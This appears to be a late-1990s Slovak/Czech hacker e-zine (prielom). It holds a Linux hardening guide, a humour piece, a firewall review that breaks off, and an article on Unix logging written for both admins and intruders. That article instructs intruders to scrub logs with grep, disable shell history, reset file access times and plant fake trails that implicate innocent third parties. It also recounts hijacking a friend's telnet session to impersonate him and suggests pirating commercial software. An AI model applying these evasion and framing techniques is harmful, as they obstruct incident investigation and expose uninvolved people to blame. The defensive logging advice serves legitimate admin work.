takze si muzete nmapnout nejakou sit a hned vidite, kde muzete zacit
s bouranim.



Timto samozrejme seznam bezpecnostnich "problemu" NetWare nekonci,
ale myslim si, ze jsem ty nejznamejsi vypsal. Dalsim zajimavym materialem, ze
ktereho se da nacerpat spousta napadu jak sit zabezpecit (a cracknout) je
Novell NetWare Hacking FAQ od Simple Nomada. Takze ted' je jen na Vas,
spravcich serveru, zda budou site nadale derave jak jsou, nebo to crackerum
trochu stizite. Hodne stesti :-)


mhi, mhi(at)hysteria.sk


navrat na obsah






Niekolko krokov k zvyseniu bezpecnosti Linuxu Slackware 3.4



Za bezpecnost budem v tomto clanku povazovat subor opatreni zabezpecujucich,
ze nikto neziska kontrolu nad mojim pocitacom, neznefunkcni ho ani
ho nepouzije k utoku na iny system.

Tento clanok je zamerany na Slackware 3.4, vacsina krokov, ktore teraz
uvediem, sa netyka len Slackware, ale Linuxu vseobecne.


Slackware je jedna z najznamejsich a najpouzivanejsich distribucii Linuxu
udrziavany na Walnut Creek. Jeho domáci archív je na ftp.cdrom.com a ma
mnozstvo mirrorov. Zakupit sa da na www.cdrom.com, www.lsl.com,
www.cheapbytes.com. Na poslednách dvoch stojí len 2 - 3 doláre, avsak
s postovnym a clom sa moze predrazit aj na viac ako 500 Sk. Zazrel som aj
Slackware na Linux 6CD za cca 1200 Kc u www.aps-brno.cz, ktorej týmto robím
nezasluzenu reklamu.


1) Prva pomoc


- Nastavenie rootovho hesla. Toto je velmi dolezite, pretoze jeho vlastnik ma
uplnu kontrolu nad systemom. Heslo by malo mat prinajmensom 6 znakov, odporucam
vsak 8, malo by obsahovat velke, male pismena, cisla a vhodny je aj nejaky
nealfanumerický znak. Nemalo by to byt ziadne zrozumitelne slovo ani rodne cislo.


Hackerske slovniky a programy sa takisto vedia vyrovnat aj so substituciami typu
L - 1, E - 3, O - 0 a podobne.



- Odstranenie bugov dodavanych v distribucii. Slackware 3.4 sa dodava
s bugovym dillon crontab / crond. Po instalacii hned nahradime cely balik bin.tgz
za novy patchnuty z adresy



ftp://ftp.cdrom.com/pub/linux/slackware-3.4/slakware/a2/bin.tgz.

Ak mienime vyuzivat pop3, je vhodne namiesto dodavaneho pouzit nejaky iny,
dobre skusenosti mam s qpopper-om, ktory sa da najst na adrese
http://www.eudora.com/freeware/qpop.html .


- Vyhodenie zbytocne spustanych daemonov z /etc/rc.d/rc.*


Obzvlast sendmail a sietovi daemoni v rc.inet2 .
Co naozaj nepotrebujeme, to nema zmysel spustat a ochranime sa aj pred
rizikom, ze niekedy v buducnosti sa objavi exploit prave na nasu verziu
daemonov. Zaroven aj setrime pamat servera.


- To iste pre sluzby a daemonov v /etc/inetd.conf . Sluzby, ktore sme
ponechali, by mali byt okliestene pomocou /usr/sbin/tcpd TCP wrappera.


- Nastavenie sietovych pristupovych prav pre sluzby, ktore sme nechali
v /etc/inetd.conf . Robi sa to pomocou suborov /etc/hosts.allow a
/etc/hosts.deny , ktore su konfiguracne subory tcpd . Cim menej pocitacom
alebo sietam povolime pristup, tym menej ludi ma prilezitost na nas utocit.


- Okamzity prechod na kernel aspon 2.0.33. Predchadzajuce verzie obsahuju
bugy v TCP/IP implementácii, ktoré umoznuju hocikomu zo siete zhodit linux
a tym mu znemoznit poskytovat sluzby (Denial Of Service Attack). Co sa tyka
kernelu, nezmenit nastavenie Drop Source-routed Packets, ktore chrani ostatne
pocitace od utokov cez nas pocitac.


- Instalacia najnovsej verzie sendmailu z www.sendmail.org . Obzvlast dolezite,
pretoze sendmail je velmi komplexny program plny bugov. Napriek tomu je vsak casto
nutne ho pouzit, preto je dolezite mat nainstalovanu poslednu verziu.


- Instalacia ssh alebo ineho programu zabezpecujuceho, ze hesla ani ziadna
komunikacia nejde po sieti nezasifrovana.


2) Druha pomoc


- Odstranenie identifikacnych znakov Linuxu. Ak neprezradime, ze pouzivame
linux, vyhneme sa utokom typu: "je novy exploit na linux, vyhladajme vsetky
linuxy na dosah a hacknime ich". Ako sa da najst Linux: Pomocou login bannerov
v /etc/issue.net, pomocou SNMP, sendmail, ftpd atd.,
pomocou hrdych bannerov "Linux inside" na WWW
strankach a hlavne podla mena servera, ako napriklad "linux.na.univerzite.sk",
co umoznuje skutocne masove automaticke hladanie linuxov.


3) Trvalo udrzatelna bezpecnost

- Nainstalovat software, ktory pravidelne (z cronu) kontroluje bezpecnost
systemu. Napriklad kontrolu setuid programov, privilegii a vlastnictva
systemovych suborov vykonava cops. Dobry program na kontrolu zmien roznych
parametrov suborov, ako casu vytvorenia, poslednej zmeny, posledného pristupu,
dlzky, zmeny obsahu atd. zabezpeci tripwire (obidva na www.cert.org). Tripwire
treba nakonfigurovat aby monitoroval tie súbory ktoré potrebujeme. Databázu
kontrolnych suctov si treba skopirovat na nejaky iny pocitac, aby hackeri po
zmene suborov nevykonali update databazy. Pravidelne kontrolovat hesla
uzivatelov pomocou programu crack. Napisat si alebo pohladat nejaku kontrolu
/var/log/syslog na zle pokusy o su, /var/adm/wtmp na nestandardne adresy.


- Sledovat diskusne skupiny a mailing listy zamerane na bezpecnost, napr.
bugtraq, linux-security, CERT advisories, SNI advisories, L0pht advisories


- Nedavat SUID bit programom, ktore ho nepotrebuju alebo bez ktorych sa
zaobideme.


- Ucit sa ucit sa ucit sa, stale je nieco nove. Nenechat sa ukolisat pocitom,
ze sme spravili vsetko a ze sme dobri (tusim som zasiel do ideologie).


4) Paranoia



Ak mate temne tusenie, ze to stale nestaci a nemozete sa zbavit pocitu,
ze niekto ide po vas, mozte napriklad preventivne upravit svoj kernel:



- Vyhodit z drivra sietovej karty kod prepinajuci do Promiscuous Mode, ktory
umoznuje odchytavat z ethernetu packety, takto dost stazite niekomu, kto hackol
vas pocitac pouzivat ethernet sniffer, a teda obmedzite utoky na dalsie pocitace pomocou zachytenych hesiel.


- Vyhodit pouzivanie modulov.



- Nastavit v kerneli kvoty na pocet procesov, uzivatelov, proces/uzivatel,
pamät/proces atd., aby nam uzivatelia nemohli zhodit system obycajnym programom
alokujucim pamat alebo procesy.



- Vykonat zopar patchov (napady podla Phracku 52 - http://www.phrack.com/52/ ):



- Znemoznit userom vidiet info o procesoch (dobry napad)



- Znemoznit exec inych fajlov ako boli explicitne povolene (dost restriktivne)


- Ochrana pred utokmi s pretekajucim bufferom


- Rozvrstvenie pravomoci na niektore operacie (potom netreba root privs) vytvorenim
specialnych groups na bindovanie na port < 1024, vytváranie raw socketov.


simkes, stefan(at)eunet.sk


navrat na obsah




unix logy



rec bude o unixovych logoch, o tom ako spravca unixu zabezpeci aby
jeho logy vierohodne a bezchybne zaznamenvali cinnost na serveri, ale aj
o tom ako moze hacker odrbat systemove logy a zmazat stopy po svojich
aktivitach. ako obvykle, snazim sa pisat z pohladu obidvoch stran sachovnice.
"hackeri" a admini su jedna banda, vacsina dobrych a security-uvedomelych
adminov v minulosti trosku robili sarapatu hackovanim... v kazdom pripade
ked chce niekto dobre zapezpecit svoj server, je velmi dolezite poznat pracu
obidvoch protipolov.


syslogd



spravu systemovych logov zabezpecuje na unixoch daemon syslogd. tento program je
stary peknych par rokov, a za poslednych 4-5 rokov sa takmer vobec nezmenil. vdaka
tomu je syslogd takmer identicky na vsetkych komercnych aj nekomercnych odrodach
unixov, vsetky vychadzaju zo starych BSD zdrojakov. rozdiel je vsak v defaultnej
konfiguracii. ked si nainstalujete cerstvy AIX alebo Solarix, syslogd je nakonfigurovany
tak ze neloguje takmer nic, komercne UNIX stanice sa totiz stale vacsinou pouzivane viacej pre vnutropodnikove
ucely na lokalnych sietiach, a nie ako Internetovske servery. avsak pokial sa aj pouzivaju ako inet servery,
admini si ich casto-krat neprekonfiguruju. chyba. distribucie linuxu a freebsd su zvycajne
vcelku dobre defaultne nastavene. "vcelku dobre" vsak vacsinou nestaci, nasleduje niekolko moznosti
ako zvysit bezpecnost logovania :


logovanie na remote server



ked syslogd spustite s "-r" flagom, umoznuje
forwardovanie logov na externy stroj. do /etc/syslogd.conf treba potom
pridat riadok



*.* @loghost


a voila, vsetky logy sa ukladaju aj na masinu "loghost".
cize ak niekto hackne vas stroj a zmaze
logy, vy si mozete pozriet logy na tom druhom (dufajme ze nehacknutom) stroji.
pokial je vo vasej lokalite viacej unixovych serverov, ako to byva bezne trebars u
inet providerov, je dobre spravit osve masinu iba na ukladanie systemovych logov.
tato masinka moze byt trebars nejaka vyradena 386ka a mala by byt totalne
zabezpecena - trebars vobec na nu neumiestnit ziadne daemony, proste ziaden
dialkovy pristup, ziadna posta, vobec nic okrem pristupu cez konzolu.
takyto jednoduchy system je nielen dokonale bezpecny, ale navyse je to aj
vcelku prakticke mat vsetky logy pokope, ked sa treba vramci beznych administratorskych
povinnosti hrabat v logoch viacerych masin.



logovanie na konzolu


zmazat subor dokaze hocijaky luzer, moze vas vsak zachranit
vypis na obrazovke, nehovoriac o tom ze je to tiez super prakticke mat vypis na obrazovke.
na linuze sa to docieli trebars riadkom :



*.* /dev/ttyp12


je pravda ze to nie je tazke odrbat - staci po hacknuti stroja editnut logy,
vymazat stopy a potom spravit nieco ako 'tail -100 messages > /dev/ttyp12'
a root si nic nevsimne. ale povedzme si, v dnesnej dobe ked je inet plny
lamerskych wannabe hackerov ktori sa nekukaju do /etc/syslogd.conf, je dost
pravdepodobne ze si logovanie na konzolu podpriemerny hacker ani nevsimne. bezny luser ktory
vie iba spustit exploit z rootshellu sa da dokonca oklamat aj tak, ze proste
zmenite syslogd.conf tak, aby logoval do nejakeho neobvykleho adresara.
da sa vlastne vo vseobecnosti povedat ze pokial si svoj server prekonfigurujete
na nepoznanie od defaultnych nastaveni, hackera to dokaze riadne zmiast a
dokazete ho okabatit. treba predvidat utok a dopredu sa takto prichystat.
pre hackerov zase plati ze okamzite po hacknuti masiny sa treba popozerat
po /etc adresari a precitat si vsetky dolezite konfiguraky, aby sa ziskala
predstava o danom stroji. predpokladat defaultne konfiguracie sa moze stat
osudnou chybou.


uprava kernelu



na linuxe je moznost upravit kernel tak, aby sa nastavili niektore subory,
ktore nie je mozne mazat ani editovat, je mozne iba appendovat do nich.
tato vecicka je vo forme kernel patchu popisana v poslednom phracku (www.phrack.com)
v daemon9ovom clanku.



syslogd s podporou sifrovania ?



uz dlhsi cas uvazujem nad verziou syslogd, ktory by kryptoval logy
a ukladal ich zasifrovane. nie je to tazke spravit, staci pouzit nejake
bezne DES kniznice trebars.. neverim ze som jediny koho to napadlo, zatial
vsak aspon ja osobne neviem o tom ze by existovala takato verzia syslogd. ludia z cZertu
o tom viac krat premyslali, ale nepodarilo sa mi nazhromazdit take mnozstvo
piva aby som presvedcil dvorneho C-eckara cZertu dusheena aby to spravil
(heh a tymto ho zase k tomu verejne vyzyvam a provokujem).



cistenie



ok, teraz par slov o mazani stop v logoch vyprodukovanych syslogd. pre
hackera je najjednoduchsie otvorit si textovy log v editore a vymazat
"svoje" riadky. avsak castokrat su logy na masine obrovske subory a
ked ich otvorite v nejakom editore typu pico, moze nastat katastrofa.
bol som svedkom takehoto dosraneho utoku na masinu - chalan hackoj stroj,
hned sa vrhol do /var/log aby zmazal stopy, a otvoril messages v picu.
ten subor vsak mal okolo 200Mb a chudak linuxik so 16Mb RAM cely
zamrzol a uz to nevykryl. rano prisiel k nemu root, rebootol ho a zvedavy
sa mrkol do syslogd, kde samozrejme nasiel stopy po tom hackerovi. buum.


na editovanie takychto velkych suborov pouzite grep, sed, awk, take cosi.
cize trebars grep -v evil.hacker.sk messages > temp ; mv temp messages.
pozor, neprepisujte stary subor pomocou 'cp', totiz potom syslogd prestane
do toho suboru zapisovat a musi sa restartnut.



samozrejme nie je problem cely
tento proces zautomatizovat scriptom,
ja som svoj primitivny scriptik zverejnil na arxive (hysteria.sk/arxiv).
cistenie logov je strasna otrava, nastastie na linuxy existuje "patchnuta"
verzia syslogd, ktory sa nachadza tiez na arxive, a ktory sa da tak
nakonfigurovat, aby nelogoval riadky s vopred zadefinovanym stringom.


jedna vec je logy zapisovat, druha vec je samozrejme ich sledovat a citat.
ked mate syslogd nakonfigurovany tak paranoidne ako ja, nie je problem aj na malej
masine mat 1Mb logov denne. obcas ma ukludnuje ked si rano ku kave pustim
pred ocami vypis z logov a pol hodinu na ne meravo civim. pokial vsak
nepatrite k alkoholikom co si rano po opici potrebuju pol hodinu pri kave meravo
civiet na unix logy, mate problem. riesenim je potom nejaky program, ktory
vam z logov povybera "zaujimave" riadky. existuje na to kopu programov,
par som si aj nainstaloval, ale kedze neznasam citanie manualov a trpim
nervozitou, po desiatich minutach bezradneho tapania v tme som ich
hystericky vymazal. napisal som si vlastny scriptik, ktory vy-grep-uje
z logov zaujimave riadky na zaklade stringov ako je trebars "fail", "root",
"changed" a podobne, takyto vycuc za predosly den si davam vzdy o polnoci posielat
e-mailom na pop server.



este jedna vec, trochu o inom. ja mam syslogd nakonfigurovany tak, ze mi
loguje vsetko a este k tomu viacnasobne, avsak absolutne nikam nelogujem
prichodziu a odchodziu postu. podla mna roota nic nie je do toho kam si
uzivatelia posielaju postu a odkial ju dostavaju. protiargument je sice
"ochrana" pred spam mejlami, ale ja na take blbosti kaslem.


tolko k syslogd.


binarne logy



druha kapitola su binarne logy, cize utmp, wtmp, lastlog a acc. utmp
(vacsinou /var/run/utmp) obsahuje informacie o momentalne pripojenych
uzivateloch. wtmp (vacsinou /var/log/wtmp) obsahuje info o tom kto bol
odkial a ako dlho v minulosti pripojeny. lastlog (/var/log/lastlog) obsahuje
zaznam o poslednom pripojeni kazdeho usera. acc (/var/log/acc) obsahuje
zaznam o vsetkych spustenych programoch. subory su binarne, strukturu si
mozete nastudovat v manuali ku kazdemu suboru (t.j. man utmp), na takmer
vsetky platformy vsak uz existuju cistice. este stale dost administratorov
dost veri na tieto binarne logy, vela z nich dokonca ani nevie ze su
editovatelne. preto ked sa vymazete z tychto binarnych logov, oblafne
to nejedneho roota.



falosne stopy



co sa tyka psychologie administratorov, je podla mna ovela lepsie naraficit
falosne stopy, ako kompletne ich zmazat. na to je genialny napriklad
bebetov wtkil, ktory umoznuje pridavat zaznamy do wtmp. zoberte si totiz
takyto pripad - hacknete stroj a zmenite WWW stranku. root pribehne zhrozeny
k serveru a zacne sa vrtat v stroji. pokial ste po sebe dokonale zahladili
vsetky stopy, neda mu to spat a proste bude hladat a hladat a hladat az
kym nebodaj nieco nenajde. preto je z psychologickeho hladiska omnoho lepsie
"spravit" falosne logy do /var/log/wtmp, messages, .bash_history, atd.. vsetko
samozrejme musi krasne spolu sediet. pri takomto hacku kludne nechajte na
serveri svoje "nastroje", pomocne subory, atd. root najde stopy a uspokoji sa,
alebo zacne hladat tym smerom ktorym ho nasmerujete. idealne je napriklad
spravit falosne stopy veduce niekam na opacnu stranu krajiny na nejaku
univerzitu na PCko umiestnene niekde v pocitacovom labaku do ktoreho
maju studenti verejny pristup. root si vymeni zopat e-mailov s bezmocnym
spravcom daneho labaku a mate to v suchu. tiez je dobre nasmerovat
stopy niekam uplne do paze, trebars na nejaku dial-up-ovu adresu k nejakemu
gigantickemu americkemu Inet providerovi (AT&T, america online a pod.)
pokial sa totiz root hacknuteho stroja rozhodne silou mocou vypatrat vynnika a
kontaktovat spomenute spolocnosti, narazi na neprekonatelny mur americkej
podnikovej byrokracie. pokial sa rozhodnete nechat na hacknutej masine
falosny .bash_history log, doporucujem spravit ho tak, aby ste vyzerali ako
totalny lamer :) dajte tam primitivne opakujuce sa prikazy, ktore vas vykreslia
ako totalneho dementa ktory nasiel niekde na webe exploit a chcel ho vyskusat.
totiz je to obrovska vyhoda ked vas protivnik podcenuje.



shell history



ale to uz som sa zamotal do vselijakych ideologii hackerskych metodik, podme
naspat k suchym technickym veciam :) z hladiska bezpecnosti je dobre pre admina
nastavit uzivatelom defaultne logovanie aspon 500 riadkov history. history
totiz moze admin pouzit ako zdroj informacii v pripade utoku. totiz nie kazdy
hacker vie ako vypnut logovanie history. robi sa to najelegantejsie tak, ze
okamzite po lognuti na hacknutu masinu zmenite hodnoty shellovych premennych
tak aby nelogovali history - napriklad v bashi prikazom



export HISTFILE=/dev/null



po pripade zmenou premennych HISTSIZE, alebo HISTFILESIZE. pre blizsie info
sa mrknite do "man bash" alebo "man tcsh".


snooping



celkom zabavny sposob logovania je snooping, cize monitorovat v realnom
case telnetove pristupy na vas server. na linuxe je na to daemon
telnetsnoopd, ktory treba nahradit za klasicky telnetd daemon, tento
genialny program je dokonca standardnou vybavou slackware distribucie, ale
trebars do redhatu ho mozete dohodit jednym rpm-kom. existuje tiez aj
kernelovy modul ktory umoznuje snoopovanie, da sa najst na arxive.



pre hackera predstavuju tieto programy na snoopovanie obrovsky zdroj
srandy. totiz vacsina beznych uzivatelov a kopu adminov ani nevie ze taketo
nastroje existuju. preto ked pocas telnetoveho pristupu nejakeho bezneho
uzivatela mu "skocite" do terminalu a zacnete mu pisat na obrazovku priamo
do jeho shellu, bude vas pokladat za ultra-genialneho hackera a klesne
mu sanka o pol metra od prekvapenia. existuje nespocetne mnozstvo humornych
prihod ktore sa viazu na snoopovanie, moja najoblubenejsia je ked som
skocil do telnetu svojmu priatelovi ktory prave irc-ckoval z unixoveho okna
a chvilu som iba sledoval jeho konverzaciu s jeho byvalou priatelkou. po chvilke
moj kamos oznamil na irc ze si ide na pol hodinku odskocit od pocitaca. vtedy som
sa ujal klavesnice a stihol som sa ukrutne romanticky dat naspat dokopy s tou
jeho byvalou kamoskou tak, aby nevedela o tom ze to pisem ja. vecer ked chudak
nic netusiaci prisiel na internatnu izbu, cakala ho tam cela zhava a nedockava
a privitala velkou pusou, on bol z toho totalka mimo.



ine logy



sakra, slubil som suche technicke informacie, co ? ok, ok. okrem syslogd
a binarnych logov existuje nespocetne dalsich programov ktore zabezpecia
sledovanie unixoveho systemu. osobne oblubujem napriklad cZert sniffer
"czniff", ktory sniffuje traffic na ethernete. da sa nastavit tak, aby
logoval vsetky pripojenia na masinu a sifroval data do suboru. da sa to
pouzit ako super logger, DES zasifrovany a schovany subor vam totiz
ziadny hacker needitne.



za vsetky dalsie programy spomeniem iba program real secure 4.2 od
firmy Internet Security Systems. je to sice komercny a velmi drahy soft,
da sa vsak stiahnut na warez serveroch, alebo prinajhorsom jemne limitovanu
demo verziu z ich domacej stranky (www.iss.net). real secure 4.2 je
komplexny sniffer, ktory analyzuje traffic na sieti a ktory by sa mal
umiestnit hned za routerom (firewallom). real secure dokaze rozpoznat
bezny traffic od hackerskeho utoku. ked napriklad spusti clovek bezny telnet,
je to v pohode. ked ale real secure detekuje 50 telnetovych pripojeni
za minutu, okamzite dokaze spoznat ze sa jedna o utok. takisto dokaze spoznat
vsetky bezne typy externych exploitov, scannovanie hesiel cez verejne sluzby,
desiatky typov denial of service utokov, floodovanie, atd. tieto data
zobrazuje na konzolu a zapisuje do suborov. kedze by mal byt na osve masine,
je nehacknutelny a neviditelny. je genialne konfigurovatelny. a dokaze
nielen hackersky utok detekovat, ale aj nan upozornit (e-mailom, vytocenim
telefonneho cisla napriklad na operator (pager), alebo zaslanim SMS-ky na
GSM teflon), ale dokonca aj dokaze na utok restriktivne reagovat. napriklad
dokaze okamzite po detekcii utoku zakazat vsetky pripojenia z utocnikovej
masine. fakt genialna vec.



real secure dalej umoznuje mat jednu spracovavatelsku stanicu, kam chodia
data a logy z viacerych snifferov. osobne tu vidim do buducnosti moznu
komercnu aktivitu na internetovskom trhu - a to jest internetovsku obdobu civilnej
bezpecnostnej sluzby. predstavujem si to tak, ze by mohla existovat firma ktora
by zamestnavala 24 hodin "straznika", ktory by sedel za pocitacom s real secure,
ktory by tahal logy zo sieti viacerych klientov (banky, vladny sektor, armada..)
a ktory by dokazal okamzite zareagovat na hackersky utok, tak isto ako normalny
straznik v banke sedi a cumi na monitory napojene na bezpecnostne kamery.



no dobre, dobre, to mozno bude v buducnosti, ked bude nevyhnutne pripojit
aj banky a vladny sektor kompletne na internet a ked "hackeri" nebudu
iba unudeni studenti prechlastani z irc sessionov s balikom stiahnutych exploitov.. vratme sa do reality k
nasim amaterskym internet providerom. v kazdom pripade je podla mna aj
v dnesnej dobe potrebny mat system, ktory nastavi pasce pre hackerov, stacia
na to male upravy a drobne scriptiky. klasickym pripadom je spravit si
napriklad falosny phf script (viz arxiv), ktory je castym tercom utokov hackerov, a ktory
dost vela hackerov otestuje pri pokuse o prienik.



access time atributy suborov



bezpecnost internetovskych serverov ide milovymi krokmi do predu, v dnesnej
dobe uz aj na slovensku a v cechach existuju institucie ktore zamestnavaju
odbornikov na bezpecnost a ktorych neodrbete len tak lahko zmazanim stop z
/var/log/wtmp a /var/log/messsages. pri mazani stop treba mysliet na
kazdy sebamensi detajl. prikladom su access time atributy suborov. po utoku
je treba nastavit (viz "man touch") access time atributy vsetkych suborov, ktore
ste precitali alebo prekopirovali. plati to zvlast pokial
utocite na masinu za cielom ziskat informacie ulozene na danom serveri.
administrator sa moze po vasom utoku presvedcit o tom ci ste informacie
ziskali tak, ze si pozrie access time atribut danych suborov (ls -lau) a
takto dokazete zakryt fakt, ze ste si precitali dane informacie.


pre administratora zase access time atributy suborov predstavuju dolezity
zdroj informacii po utoku. pokial ako administrator mate podozrenie ze
bolo hacknute konto nejakeho uzivatela, ale vobec to nevidiet v syslogd alebo
wtmp logoch, skuste sa pozriet na access time suborov v jeho domacom adresari
(trebars .cshrc, .bash_login a pod). pokial wtmp ukazuje ze uzivatel sa naposledy
logol pred tyzdnom, ale jeho .cshrc bol citany vcera v noci, je jasne ze nieco
nie je v poriadku.



outro



pokial si hacker-zaciatocnik, vedz ze vycistenie /var/log/wtmp a /var/log/messages
vobec nie je dokonale zmazanie logov. uvedom si ze na internete uz davno nefunguje
anarchia divokeho zapadu, kde je mozne beztrestne robit bordel. pokial hacknes nejaky stroj, je
mozne ze pouziva nejaku z vyssie popisanych logovacich metod a ze ta admini odhalia a roznosia na kopytach.
pokial si admin, islo mi o to naznacit
ze nie vzdy treba slepo verit logom, a ze pokial potrebujes vieryhodny a stabilny zdroj
informacii o diani na tvojom serveri, v ziadnom pripade nestaci mat defaultne
nastaveny syslogd a binarne logy.



pajka, pajka(at)hysteria.sk


navrat na obsah





Hackeri - sexualny idol informacneho veku



Som presvedceny o tom ze zeny miluju hackerov a mam to podlozene
Darwinovou teoriou, zeny totiz preferuju tych najsilnesich a
najschopnejsich. V minulosti slo o to mat schopnost zabit medveda
jednym uderom tomahawku a priniest zene medvedie labky k nedelnemu
ohnu a zavesit kozusinu na stenu jaskyne, avsak tieto vlastnosti sa
stavaju coraz menej dolezitymi. Prichadzajuca era informacnej
revolucie nam prinasa tri jasne rozdielne smery evolucie homo
sapiens:



Prvy evolucny typ su hackeri - expertni znalci pocitacov a
informacnych sieti. Tento typ homo sapiens sa postupne prepracuje na
veduce miesta nasej spolocnosti a bude vladnut svetu. (Vynimkou su
unix administratori a tech support, ktori sa obcas svojvolne nazyvaju za
"hackerov starej generacie", oni su vsak odsudeni na zivot v tupej
nevedomosti)



Druhy typ su bezni pocitacovi (l)useri, to je ten typ ludi co sa
tvari ze ovlada MS Excel ale pritom potajme maju v sufliku
pracovneho stola kalkulacku a vzdy si radsej vsetko rucne
prepocitaju. Je to aj ten typ co sedi s pootvorenymi ustami nad
novou verziou DOOMa, neovlada cheat kody a bedzuchu klika cely den
do tlacitka CTRL. Tento evolucny typ postupne vyhynie na svoju
vlastnu blbost.


No a finalne tu je tretia vyvojova kategoria homo-sapiens - luzeri - ludia
nepouzivajuci pocitace. Tym postupne narastie srst a chvost a budu
umiestneni do ZOO kam sa na nich budeme chodit pozerat a krmit ich
bananmi.


Takze je samozrejme ze zena si vyberie evolucne najsilnejsi typ -
hackera s potencialom stat sa svetovym vladcom.


Zeny miluju muzov co dokazu pocuvat. Inteligencna a vyzivna hodnota
toho co sa muz snazi povedat zene nema na nu ziadny vplyv. Zena ma
najradsej ked moze ona trepat a muz iba pocuva. A povedzte mi, kto
ma najvacsiu schopnost sledovat obrazovku pocitaca cele hodiny a
hodiny bez toho aby povedal co len jedno slovko ? No predsa hackeri
! Preto je pre zenu hacker uplne idealny partner.


No a zoberte si ozonovu vrtsvu. Pravda, kedysi boli v mode opaleni
svalovci v ciernych plavkach ktori obletovali dievcata na mestskom
kupalisku. Ale vazeni, pri dnesnom stave ozonovej vrtvsy budu tito
opaleni svalovci uskvareni zaziva ako spekacky a umru v pekelnych
mukach. Ti co neumru budu v klietkach v ZOO a my sa na nich budeme
chodit smiat (a krmit ich tymi bananmi).
Preto zeny miluju muzov ktori sa zatvaraju na 24 hodin denne doma
pri pocitaci.


Henry Kissinger napisal ze moc je ten najsilnejsi afrodiziak. A Bill
Clinton povedal ze mudrost je najsilnejsia moc. Z toho logicky
vyplyva, podla prehlasenia vlady Spojenych Statov, ze mudrost je
nasilnejsi afrodiziak. Pre tych co by chceli proti tomuto
argumentovat - pozrite sa ja som iba zasrany binarny schizofrenik -
ale toto tvrdi vlada USA, tak to sakra akceptujte. Nezabudnite ze
vlada USA ma pod kontrolou distribuciu a dane na cigarety, alkohol a
drogy - takze maju dobre skusenosti ohladne uspokojovania zien.



Dievcata, vsak si uvedomte (citaju vobec Prielom aj nejake dievcata ???
ako ano, ozvite sa ! zalozte 'fan club prielom' ! napisem vam clanok o tom ako
na linuxoch robili ten film "Titanic" !) ake romanticke je to sediet
v tmavej izbe osvetlenej iba jemne nevtieravou ziarou 17" SVGA monitora
- je to vrcholne intimna atmosfera (sviecky patria do ery lovu na medvedov).



navrat na obsah




00000001000001020061730200618997
pajkus
 pajkus      03.03.2004 - 11:47:46 , level: 1, UP   NEW



::::::::::. :::::::.. :::.,:::::: ::: ... . :
`;;;```.;;;;;;;``;;;; ;;;;;;;'''' ;;; .;;;;;;;. ;;,. ;;;
`]]nnn]]' [[[,/[[[' [[[ [[cccc [[[ ,[[ [[,[[[[, ,[[[[,
$$$"" $$$$$$c $$$ $$"""" $$' $$$, $$$$$$$$$$$"$$$
888o 888b "88bo,888 888oo,__ o88oo,.__"888,_ _,88P888 Y88" 888o
YMMMb MMMM "W" MMM """"YUMMM""""YUMMM "YMMMMMP" MMM M' "MMM

prielom #5, 8.4.98, prielom(at)hysteria.sk, http://hysteria.sk/prielom/




obsah



intro

eagle firewall

zasek do zivyho 5


kterak privest antivirove firmy k silenstvi?

inet na strednej skole #2







intro



Minuly tyzden som stravil na brehu Michiganskeho jazera, v state Wisconsin. Stala sa tam taka vec, ze na Danovom Urade v tomto state sa pokaslala laserova tlaciaren a omylom natlacila ludom dva preplatkove seky namiesto jedneho.
Omylom tak bolo vydanych zhruba milion dolarov. Ludia co dostali
dva seky si to zjavne vsimli, ale
potichucky si ich dali v banke preplatit a modlili sa ze si to nikto nevsimne.
Na danovom urade si to veru nikto ani dost dlho nevsimol. Medzi ludmi totiz
vladne totalny kult techniky. Pocitace a elektronika su symbolom
pokroku a vysokej zivotnej urovne. V nedavnej minulosti, pocas studenej vojny, bol
technicky pokrok meradlom uspechu v pretekoch medzi zapadom a vychodom.
S tym suvisi nasa totalna dovera voci pocitacom. To co povie pocitac
je vzdy pravda. Pocitac sa nikdy nemyli. Ustredna tema tohoto e-zinu
je poukazat na to, ze informacne systemy, ktorym vsetci tak slepo doveruju, vobec
nie su take bezpecne a dokonale, ako si ludia myslia.



Roky stravene na internete vo mne vytvorili vztah k uletenemu, vulgarnemu, cierny humoru
utociacemu na tuto zaslepenu doveru ludi voci vypoctovej technike. Na tomto
humore je postavena cela filozofia CzERTu. O par rokov bude vypoctova technika zasahovat do vsetkych sfer naseho zivota.
Je nevyhnutne uvedomit si ze technika moze byt zmanipulovana, hacknuta,
modifikovana...


A teraz uplne o inom. Bol by som rad keby sa mi ozvali ludia, ktori by boli
ochotni prispiet do prielomu. Uverejnim akekolvek zaujimave clanky,
ktore sa aspon jemne dotykaju celkoveho zamerania prielomu. Stalym prispievatelom
ponukam priestor na hysterii, anonymne unix konto so sifrovanym diskom a postou a
pristup na sukromne diskusne forum uzivatelov hysterie, kde moze komunikovat zo zvyskom
posadky o spolocnych konickoch.



tento prielom je trochu kratsi ako zvycajne, planoval som este
pridat dva clanky, ale od zajtra budem dva tyzdne dost vytazeny, tak
radsej v predstihu vydavam toto kratsie cislo..




pokial xcete dostavat e-mailom oznam ked vyde nove cislo prielomu, poslite mejl s textom
"subscribe prielom" na adresu prielom(at)hysteria.sk.




pajka, austin, texas, 8.4.98




eagle firewall



tagze.... eagle firewall ako iste secia tusite je software na vytvaranie
softwarovej ochrany pocitacovych sieti. moze byt konfigurovany ako
paketovy filter alebo sietovy zataras. tiez umoznuje vytvaranie
virtualnych privatnych sieti a tunelov medzi dvomi pevnymi IP adresami alebo medzi
jednou pevnou IP addx a jednou dynamickou IP adresou (eagle-mobile). sucastou
balika eagle je samotny firewall, proxy aplikacie pre sluzby ftp,
telnet, http, cifs, nntp a dns. ten kus co som mal k dispozicii bol na platformu
m$ windoze nt ale firma raptor systems dodava tento balik aj pre unix.


hw a sw naroky


podla manualu su min. hw a sw poziadavky pentium 133, 32mb ram, 1gb hd,
mys, rozlisenie obrazu 1024x768 a podstatne su najmenej 2 sietove karty. disk
by mal byt formatovany na ntfs a mal by byt vytvoreny aspon 200mb swap
file. na tejto konfiguracii vsak firewall chodil velmi pomaly. na p166mmx,
64mb ram, 2gb hd chodil eagle celkom svizne a dalo sa s nim pracovat. samozrejme
ze operacny system by mal byt winnt4 server a nemal by byt priradeny do
ziadnej winnt domeny ale mal by byt clenom pracovnej skupiny. tiez je nanajvys
vhodne mat winnt skonfigurovane ako standalone server ktory ma nainstalovany
len protokol tcp/ip ktory je boundovany na vsetky sietove interfasy.


instalacia


pred instalaciou je nutne poziadat vyrobcu o aktivacny kluc. bez tohoto
kluca sa neda soft instalovat ani pouzivat. takze ked vyplnime papier zvany
